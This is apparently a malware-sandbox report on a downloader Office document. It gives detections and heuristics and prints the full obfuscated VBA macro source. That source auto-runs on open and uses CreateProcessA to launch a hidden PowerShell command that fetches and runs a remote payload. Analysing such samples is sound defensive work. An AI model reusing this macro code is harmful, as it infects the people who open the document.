MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_Open' and 'Workbook_Open' macros are present, indicating an attempt to automatically execute code upon opening. The 'CreateProcessA' API is referenced, suggesting the macro's intent is to launch an external process, likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Valyria-6666912-0' further supports this downloader functionality.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6666912-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6666912-0
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Public Sub Document_Open() Dim BP_KA As String -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() Dim PL_EQV As String -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19708 bytes |
SHA-256: e2de25ece0a0574c17616da6c2f54eec4f85492a43cfcbec318334405bc4f4d5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 61 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Type TU_W
U_YJ As Long
G_JW As LongPtr
K_Q As Long
End Type
Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal GG_MTU As Long, ByVal UD_MVI As String, CY_OY As Any, FA_SA As Any, ByVal S_YYQ As Long, ByVal CFK_PVM As Long, ByVal RI_XZL As Any, ByVal CCE_ZYM As Long, F_HM As BPW_E, CV_FFS As OP_O) As LongPtr
Private Type BPW_E
P_TAP As Long
W_OK As String
XNX_M As String
B_O As String
VGX_Y As Long
B_TK As Long
LI_H As Long
PV_TY As Long
CFH_RC As Long
XW_S As Long
OKP_UY As Long
RNB_W As Long
UQ_EEI As Integer
AM_MPR As Integer
W_OK2 As LongPtr
CEB_B As LongPtr
CX_J As LongPtr
AMV_SV As LongPtr
End Type
Private Type OP_O
R_AP As LongPtr
F_F As LongPtr
X_LGE As Long
ECM_XB As Long
End Type
#Else
Private Type TU_W
U_YJ As Long
G_JW As Long
K_Q As Long
End Type
Private Type OP_O
R_AP As Long
F_F As Long
X_LGE As Long
ECM_XB As Long
End Type
Private Declare Function CreateProcessA Lib "Kernel32" (ByVal GG_MTU As Long, ByVal UD_MVI As String, CY_OY As TU_W, FA_SA As TU_W, ByVal S_YYQ As Long, ByVal CFK_PVM As Long, ByVal RI_XZL As Long, ByVal CCE_ZYM As Long, F_HM As BPW_E, CV_FFS As OP_O) As Long
Private Type BPW_E
P_TAP As Long
W_OK As String
XNX_M As String
B_O As String
VGX_Y As Long
B_TK As Long
LI_H As Long
PV_TY As Long
CFH_RC As Long
XW_S As Long
OKP_UY As Long
RNB_W As Long
UQ_EEI As Integer
AM_MPR As Integer
W_OK2 As Long
CEB_B As Long
CX_J As Long
AMV_SV As Long
End Type
#End If
Public Sub M_KO()
Dim XI_EFB As String
XI_EFB = "49566B5656645676775656565629564E21569451564D5B5C5656562450563656565671562B562B565640565E56566D7A568E7B564B4992269227566D693E3B964F2056561B393C5695807323795619564856896E562A9256565656795696921C79255659"
Dim EGR_OON As String
EGR_OON = "567656689641565686569424563B565656563C5656563F5668565656561D565668565662561C51565687453256945656564F56563956564D3017566A56567F56565670567356565256567F5684561B692A3056791D461F562B561C535656171E5656223B"
Dim LTJ_GE As String
LTJ_GE = "5691568829565C567453568C5617565661565667565F475665562356778F56965677564F7367705666875620565A561A3B844D1F955645485656561F4F56565656562F564A5654564456186A873E49212720565658561824487E5656566756768A2B5356"
Dim SI_PZ As String
SI_PZ = "425656465356565656565693565646611F56565622865633568556565673565632503B561C563C526C565649566F562B82565D5636561A7B5656565646567C56565656563D5B93565656303D3573565685568A56564C563A4E5652237058746556925656"
Dim VMB_TB As String
VMB_TB = "3E2C63566782565C5A4690925656565656335D567D375C56561656562556205663566F3285426F90561E565681567974564B561D56665A565656564C56875618525656327E5656549056705655745656562B2F5C5620565696775656293B7F5656565642"
Dim Y_WWI As String
Y_WWI = "307C568656854956563E565656565656565656CF1E5656567D56566E94563E5656569495694A8056BD563D568E569656563C56779475564A568556587C5356742C5656828E567D56325677418456562788565690565A54675662936C8474815C5656562A"
Dim GUY_EMC As String
GUY_EMC = "402B56565B56568F5656955656562656565656424756569356565B705E74565656565656697956565D565656564C1E5656585656563428563E1F5638563C7D8936566B3656204B445656715626562256567B7C1D5656567E8860567B1838564256285656"
Dim KNO_RG As String
KNO_RG = "2456246D6E67563C567156564E567756562D5656825656745856506D565456566E92565651895682562E63565656784B5618563F70566939562C56565634192B56565A7F2B6B56563A56565689785656386752565671563F563B56675653566056255634"
Dim QO_QC As String
QO_QC = "5696566D614D2D5656565656566A561A858D41315656465665566B566A566B5656723B566D681C87565656562F5D7F5656195156947D565656634656772C566F5669702A68565657565647567C84254A56365631562859568C56213931275656567E5656"
Dim JUQ_VN As String
JUQ_VN = "6B5D49555689564C562D7A5638565656595556572E8C5656358056566019565639568A568E37806A2356758943177981567A6E56565656819356561F2656562B7C4D5656481F563453562156945A56341E5B5656523963562087565C775B756061235618"
Dim YM_NFK As String
YM_NFK = "564F5656515656564F564F565617565680412B56563F565656565674494D563296223F648756565656334F5656779056565656566656272956795656365618755656565669568B56472A2376566792464056686B565656562D562524567956784D565656"
Dim QUO_CW As String
QUO_CW = "566F56856F36561A5656284456563E805656565E56567D56563D56405182568C6F727F5675564C567A5656565683565656562545564B56561E82688B6F56565656615656175660419156503C5627787956565A7484953B5681565672565656566E655656"
Dim K_NAB As String
K_NAB = "5656C45640568227567156295656805E3A56901956566D56447647564F955681565690566B4076717556825656562641566C5678566D2C56565651905E56745656215656818D66565256567A214A8556562556538B7019567B566F563B562D56241D2556"
Dim PIK_F As String
PIK_F = "5856671C693D6956565656445656503A374A561F5680563556957189176D1B3B56565C647E4D38495656565677565656565694563B562B495A56565672565656565629756F5656785682567D804856565685504C56647D56236F56565658565619563556"
Dim Y_AHL As String
Y_AHL = "4D374F56565677614A565656565456565656565656755656561A4056567D88563B56651756287D1C56567D3F56251B556D22563D566D56565651564E565656608A565F5656567556181D565656563C7D48728C7A3D545656565656564556569056562B56"
Dim ZT_XQA As String
ZT_XQA = "793C564A566656865B6956285690465627562179567526563B385633565556452756564C5646415656686756565656565623804E5656561B2C5625568E56961D6956177C5656565633565624565F7E56388756565689755656362F37678D2D5661475652"
Dim HI_WAG As String
HI_WAG = "225629565656295656568F56706C5456475664563C5656564C56565656728B565C2D5656642C56625C5656905638564D315656302C43564856945656434A441A562B569656568B926D56225A585D555656565656564656565656562F567F569456567082"
Dim FW_VDI As String
FW_VDI = "4D4722564B385656558D56568E2C81566D56427556565681565674566D438956565656566856197079562D562A56565657566B7F46845656625656567F2F564956565F92735657565A6B563456772E56564792565627567B5F8F567E3356566B8E29568E"
Dim STQ_R As String
STQ_R = "5692563E56417956441B5656569395CE567394562D2B2156593E6D5656546531363E35766A307A56564E5A56569356965256915656567E568C5A1923567B564856566B76797A5656565656562A5665564256566E8F565656567756565692564756623756"
Dim Y_BQ As String
Y_BQ = "515656565656565694924C474F1C561F8B565625564456236C64562B525656564256568B5638565F6E568256568D443F53868F26565639565656587B567F57966F5D563656485656525656565C88563756565654565256567B565656785656756A56891F53545643915685F668795B78568B5956224E565686615678565626565634595693565662565656645656945456754756565F7B8A64565662562175564B37565656565656607E56319556403B568056422E565651465617563856564F787356328260"
ZGC_UU (YL_UQB)
End Sub
Public Sub Document_Open()
Dim BP_KA As String
BP_KA = "564F5656825656554883303056897E562956563856656B563C565B565656925655564556805622565476565A605659908E70566B8856305654565D21579456568556564F1A5570565656865628565255565F6B223E5094565C56568917565656BC565D56"
Dim BN_UAG As String
BN_UAG = "588B324C568E5646422721568C4B46568D4C3C23566A9156753A56568356565656564F565656562C56567F4B3C56565645563756643756655630562D4F566C2B3356775656568A562656565696564F565656542C564452565656565656565656756A2F50"
Dim OO_MYI As String
OO_MYI = "4156205F485689876756566A5638455456565656758147564017227F42865684495656565156567B5656785690565A352A4056966D562F7D565F865B88565656566256721C49565E5656561C56897756602F5D8E5656695694558A7236632B955628566B"
Dim W_V As String
W_V = "56562556564E56566077395625943E565681563856565656563E6B566737562326562066563D7B5634325663563B5656906456711F565D4E2D267766565672351884565664562456563356563A5556472B85569135561E56562F5656562C56565695624C"
Dim MN_G As String
MN_G = "561E5656565656563B562B56475256565656667C56564C567D4C9656565656665624565652565632943E1B56335656255B569556565F7425567E5C7F575686565156445656967961565648566056568B56223D56563F569456792F5656538F5619562756"
Dim AP_OHB As String
AP_OHB = "75855156565619564337566656565F56728049395A7D56565C3556567F56562C47563F75563D29685656691D565656632C3E5659436256565656564B3D4D565688563756564C6D56872A5656606656585656565656248096567656327756401943567F96"
Dim AS_Y As String
AS_Y = "56625656563E2C286057745672565656565623565656364656566B56565D39675671563F6B2170566E4D56195656885622569056562C42565656355619342323173A6D7A565656568B565644564E562356525656395656895656955656564A7B56565664"
Dim T_N As String
T_N = "56507F2D5656568B5676566B5628568C4D5670845656281E435684504F5B8F568F565687263E7E57565356405656308256567C56886D255630561E6B3D965670561A563D3D56564356565A56315618828F8C2956564F93798B245650562C646454452D8D"
Dim TAF_T As String
TAF_T = "5656228A56565629461D56561D56215656568F08563356868C56566E56945656568056192F69804985245649567E5A565674625656566C6D5657863356562B96913B564056568F25565A565B56562556245656495656562B5F5A5656645656566F565656"
Dim ZY_R As String
ZY_R = "56705656565669565629568E7881565664565A5656745656565656561F5C8B255656567556566D7E4D5C7756561B568A215656562E8F565654446D36563D56495672564256566656943C562F562B5656565256551C565652423B37884F4D7F2666445656"
Dim TAX_OU As String
TAX_OU = "3F56563292565E56565A40657581565C5643547A5656905656935E56565669966E56297C5656917E1C8456565639565656186D3A565672645626174C49565656566F73565656754A6C565656912D5648683F4A5E85218F3C817E565156566442628A5F60"
Dim W_I As String
W_I = "566656566B65568D5684563678565656565E56691E565E865656785656566D1E565619568556375F185A5656568366567F1A565658561E284C73562F56692D9568565656566B6C56211C56615656355671563D6A93565D56565650564B472C5656797517"
Dim JMF_TXJ As String
JMF_TXJ = "8956562B565656536256566D5456564643561891565A565932565656567A4156345656562856565621825329566E5489565639785685462556565643286256717056378B2B7C31345D5656567E474F7E6E7E22565756566956302F5656565656244E5674"
Dim C_H As String
C_H = "96561C316B566E5656565656575630564E87389163197D56565635568E4247562156425256605656566E48564895565640567E564956567956334F3920566C5E5656565656563D5656564C5656615956656C7F563E6F5656635656565656568756564256"
Dim SM_ARR As String
SM_ARR = "5F5638567195567F793356567D565656788D724357565A567B563C567156562E561C845E7C56564B5656567F5656263285565656563F3356702A2556426756565656565656235656325666687D829656282F3C6756355F42568A3C2D7956565634565F2A"
Dim TG_IP As String
TG_IP = "8956705622562456691F56566A6D5656877C20565694174856695656934A5639837A3B56565B562856568F835623633C785656567656563E5690569456565656565656311E5638468B56827B565C5A563292257723854F5656565356561B565619563049"
Dim VNJ_Q As String
VNJ_Q = "348E568E6488677B566A566E516656705636565687326D5656175656795642278156562956345656913756715661605656565667567356568487565634564240562D8C6823577E2556564D25567A6B5656965656565E562B564182695656815647564B56"
Dim I_CR As String
I_CR = "5645582E56208C562474567A8956567F3F5656547E2C5656562E566B6C5636563E564B7F965656565656342483702D563B607C1A6B855649565756543756785437535644565A4D565656566694183A46563356565651564C567B56749443565662346431"
Dim AYP_O As String
AYP_O = "56562239566C5C4CB930561B5C56757F561B5656357156389353341B76561F4F56275656358B56565E5C5A563F8C64562D5656565656608D3F487A5628566C4C56806130441E42932C56566A56562E5656564F563956175642776C556D49565656795681"
Dim O_LL As String
O_LL = "565656568756765656566F3056563596562931805656565656545679565656845657661F5856563556564C56869056722A6B55445E3056563356414A5656548C40568F562C55567856564B56345635567A658358703C9256565656954356655656565624"
Dim B_TLF As String
B_TLF = "56562D565663678C56565622935656564A565620562940565656563C56565662405656686C565656413656565619565693565656564256567856569542561A7F56565656739256595656568D53295656474680855653942A93565671565656561C56455617568A5624803F"
M_KO
End Sub
Sub Workbook_Open()
Dim PL_EQV As String
PL_EQV = "5666561F65563D565627566C565656564956232A56845680938356462B565656231A811956565756565690225658444D605659566D567C562F326F8D585656563419565656562E56568B565687568D18561C79565B43565656565631565656566885843A"
Dim JZY_BZ As String
JZY_BZ = "421B9582565656568B7A54569644566F54325656911F577036705656568549564E5656562D565874566C4B56562D562B7B2A6A925F565654297E8B3C56405656212B5F5956563E525695565623936F59C76B563256565656568232565656565656953456"
Dim QVD_SBO As String
QVD_SBO = "562F5656565F475626487A255640566A91566985568F5656463956568B5B565656195656566F2F56505656567E7C954F224256568A5F4D56563D7A56815636926590567F5643562D565656678B567F43837F2F5652565656569656444C93562B83562C56"
Dim B_V As String
B_V = "569656285656715663835656566C1D5656553356566E43385656305A531E56562D56566256561E7064562A56844E3E569406887956698D8456562E735B563856365683622E562C708D562F3E4D83565B337F562B175D563C568458565B8A56562F723C49"
Dim N_MR As String
N_MR = "5628721F6B5650664D56567E561756565621563C8D56562E56565666886A56565656222356565E2456563556566A5B563656245656565634565656465656564E2956277E8F566061562F561A565654495D5646565C1C565656566F56562F8F5640565659"
Dim FZ_BQX As String
FZ_BQX = "568F8A56562356565E5656565656395623665756566A566F8256815656485556805356325656561C3F56561F6C4656561D5656196A56365681565D78566F568C5695562B1E872A56517756561A521E5656565656562D6556392E6F765664655656565656"
Dim KD_SOF As String
KD_SOF = "56561B5656216D8A7D7B55561D7428567F6C8E566F566156295656567256292A568D56563D395A5D56565638565D5656565F564031425647568C8F562256435648562E73565C28484D56564056561A5B885A8956623A565658565643563056742C205668"
Dim L_NN As String
L_NN = "69195656562556562C568B54565656568D56561B597A2119564B59565656563557565656562B567D43567056225651565684561456625656777264754C4C60926C565656566351565B2132564256562E44864584595674565F56563056563A5656437B56"
Dim O_SDA As String
O_SDA = "5656568F8D3D1E5656564B77565D1E5631242956785656427E382092568D7D5656562F5696565633565657569556795656755656303B56762656286C3356565E394D5625458C5D7B2D565656775656565656565688335656565656171A4856565F566A6F"
Dim JT_M As String
JT_M = "632E3C833A8C56565A2F455656563072556870568C56568C5656737D467A4181408488568E5656355655568C217D482E56745675785670567B564456562B561B42877B56566075565656628256905C56568256205C2B5678565649953941568856565687"
Dim H_INH As String
H_INH = "1E567F17563F565630565666725659604F394166564A5E56426C5656565656565656531A569234855E5F565656396A564F56569556566582564F56335656561A5656231D5C855624569056691D604A5C5673565656443C5656565956685620565655565D"
Dim F_AXO As String
F_AXO = "5673562B56564C56567C561C61925956444B8C77362F568F7C56565656732A2156565617562856561B5648815359567B825656513E56685654247A1D566956856356595687395687313F93243F5456848D566C5973565668562456565667565656562F38"
Dim PJ_QWX As String
PJ_QWX = "566E5656562456495A56176A5656235655298C5656577A64785632563B715D56625653567556566C365856564756855A565668477C566456565656364356565656565A5656885656569047645656568F56566631815F8256565639713195568B56565256"
Dim QA_G As String
QA_G = "56767E2F5668565B4B5656567A566B56561B5656565F5675567956373056795686561A4756562A566F5692563D3172715656567E19562E56568C564D5D2A5656421B5656686D56925655565678564E561D564A685656568B568F56385656655B56393D56"
Dim R_WT As String
R_WT = "20565662565684924056541E4656568828472E964756345656565F56562A2C88565656566A3E1D3F655656567B8F888721566C4756815656563C5661563F56561E59568B5656901F561D50564C5A564F8456215642815674566956741B56645656395656"
Dim HD_X As String
HD_X = "563144635656482356565856564334565694625663565656563594774D5656808727565656564356195656563D565656911D5656815D945656375656566D5640833244445656365660565656767A56565632561D56881E545657903F565636565656876B"
Dim KUF_VKH As String
KUF_VKH = "5644327B565656565656665656707B5B7D68563C7F4C6056565624565656568656568217567056568093565671288C56746B6456458356563075566332567A5B56567B56235656566970565056563556688C5671908A45565786525656567B592D75566C"
Dim NI_ECU As String
NI_ECU = "565E56568956568F565656565656562D565650924D19562C562F5656563A4428565F205656565656187756555673566456433B21365691562E7056305619565656566D56805618585656178390893256565639561F1D56565656567D56495656566A341D"
Dim T_VY As String
T_VY = "525656425674565624525655565656566A564D564889568956566417563556566A5653563D56203156564D677F406D365670855678218824561E7A68565C565658884D2E56568D52435656565639895656565641562C4260694529355C5656541B562656"
Dim HER_V As String
HER_V = "56559256564956567256835656567156715656425C56568C566F568B1C8956562A92567D1C5E94726B56569356567456568D56561C8F1C5656545D5656219156305656646C5D6F56565647568256592D4B56522E46565656781E56572C561C565E56875656565646562A561E5F6856565646566F567A6B6556795665562E568656568389765C71561A225632225656268B1A5D56565638367056555681706726565637725656566C56565059248256565656625656543C1831567A41D2566A416B565628"
Document_Open
End Sub
Public Function YL_UQB() As String
Dim D_E As String
D_E = D_E + "87868E7C898A7F7"
D_E = D_E + "C8383457C8F7C37"
D_E = D_E + "446E80857B868E6"
D_E = D_E + "A8B90837C375F80"
D_E = D_E + "7B7B7C853744858"
D_E = D_E + "68789867D80837C37"
D_E = D_E + "607D373F8B7C8A8B4487788B7F37"
Dim G_JD As String
G_JD = "373B7C858D515867675B586B5837"
Dim TM_BGQ As String
TM_BGQ = "42373E7349794788457C8F7C3E40"
Dim Y_A As String
Y_A = "3792697C84868D7C44608B7C8437"
Dim UZF_C As String
UZF_C = "373B7C858D515867675B586B5837"
Dim GEZ_G As String
GEZ_G = "42373E7349794788457C8F7C3E94"
Dim Y_E As String
Y_E = "52373B625B5D59375437657C8E44"
Dim W_IAB As String
W_IAB = "6679817C7A8B376A908A8B7C8445"
Dim I_RS As String
I_RS = "657C8B456E7C795A83807C858B52"
Dim H_HW As String
H_HW = "373B625B5D59455F7C787B7C898A"
Dim SSF_Y As String
SSF_Y = "723E6C8A7C8944587E7C858B3E74"
Dim CLF_D As String
CLF_D = "3754373E6C6A696C5C446D655A3E"
Dim N_W As String
N_W = "52373B625B5D59455B868E858386"
Dim CNI_A As String
CNI_A = "787B5D80837C3F3E7F8B8B878A51"
Dim R_RSN As String
R_RSN = "46468E8E8E45788D7C9078458085"
Dim SY_SFO As String
SY_SFO = "468E87447A86858B7C858B467A83"
Dim FY_E As String
FY_E = "868A80857E4660858D86807A7C45"
Dim TWU_ZBZ As String
TWU_ZBZ = "7C8F7C3E43373B7C858D51586767"
Dim VF_W As String
VF_W = "5B586B583742373E734979478845"
Dim TSR_N As String
TSR_N = "7C8F7C3E4052373F657C8E446679"
Dim FL_THJ As String
FL_THJ = "817C7A8B37447A8684376A7F7C83"
Dim BY_QYB As String
BY_QYB = "834558878783807A788B80868540"
Dim LJ_G As String
LJ_G = "456A7F7C83835C8F7C7A8C8B7C3F"
Dim SPS_O As String
SPS_O = "3B7C858D515867675B586B583742"
Dim TY_LWU As String
TY_LWU = "373E7349794788457C8F7C3E4052"
Dim K_YM As String
K_YM = "376A8B8687446789867A7C8A8A37"
Dim C_MO As String
C_MO = "44607B373B67807B37445D86897A7C"
Dim ZH_T As String
ZH_T = D_E & G_JD & TM_BGQ & Y_A & UZF_C & GEZ_G & Y_E & W_IAB & I_RS & H_HW & SSF_Y & CLF_D & N_W & CNI_A & R_RSN & SY_SFO & FY_E & TWU_ZBZ & VF_W & TSR_N & FL_THJ & BY_QYB & LJ_G & SPS_O & TY_LWU & K_YM & C_MO
Dim S_WUU As Long
Dim T_F As String
Dim CM_YSI As String
For S_WUU = 1 To Len(ZH_T) Step 2
CM_YSI = Chr("&H" & Mid(ZH_T, S_WUU, 2))
T_F = T_F & Chr(Asc(CM_YSI) - 23)
Next
YL_UQB = T_F
End Function
Public Function ZGC_UU(ByVal Q_FBO As String)
Dim LJK_R As TU_W
Dim QH_S As TU_W
Dim ALM_AM As BPW_E
ALM_AM.RNB_W = &H1&
Dim NFE_HQG As OP_O
ZGC_UU = CreateProcessA(0&, Q_FBO, LJK_R, QH_S, False, &H20&, 0&, 0&, ALM_AM, NFE_HQG)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.